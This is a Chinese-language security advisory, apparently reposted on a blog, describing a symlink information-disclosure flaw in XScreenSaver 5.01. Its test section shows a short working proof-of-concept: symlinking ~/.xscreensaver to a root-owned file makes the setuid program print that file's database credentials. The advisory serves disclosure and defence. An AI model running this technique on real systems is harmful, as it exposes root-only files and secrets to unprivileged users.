XScreenSaver符号链接本地信息泄露漏洞

受影响系统:

Jamie Zawinski XScreenSaver 5.01

描述:


BUGTRAQ  ID: 35574

XScreenSaver是X窗口系统的一套屏保程序和屏保框架。

Xscreensaver程序使用~/.xscreensaver文件读取配置选项。如果这个文件是指向其他文件的符号链接,在解析这个文件时就可能显示该文件的内容。

<*来源:Nikolaos Rangos
  
  链接:http://milw0rm.com/exploits/9097
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

kcope@opensolaris:~# ls -la /root/db.php && cat /root/db.php
-rw——-   1 root     root          61 Dez 27 17:59 /root/db.php
$db_user = "root";
$db_pass = "secret";

kcope@opensolaris:~$ ln -s /root/db.php ~/.xscreensaver
kcope@opensolaris:~$ ls -la ~/.xscreensaver
lrwxrwxrwx 1 kcope staff 12 1986-12-27 18:01 /export/home/kcope/.xscreensaver -> /root/db.php

kcope@opensolaris:~$ xscreensaver -verbose
xscreensaver 5.01, copyright (c) 1991-2006 by Jamie Zawinski <jwz@jwz.org>.
xscreensaver: running as kcope/staff (101/10); effectively root/staff (0/10)
xscreensaver: in process 2186.
xscreensaver: /export/home/kcope/.xscreensaver:1: unparsable line: $db_user = "root";
xscreensaver: /export/home/kcope/.xscreensaver:2: unparsable line: $db_pass = "secret";
xscreensaver: 18:02:26: running /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper: No such file or directory
xscreensaver: 18:02:26: /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper did not report a GL visual!
……………………………
……………………………
……………………………

可见在xscreensaver输出中显示了属于root的db.php文件的内容。

建议:


厂商补丁:

Jamie Zawinski
————–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

发表评论?

0 条评论。

发表评论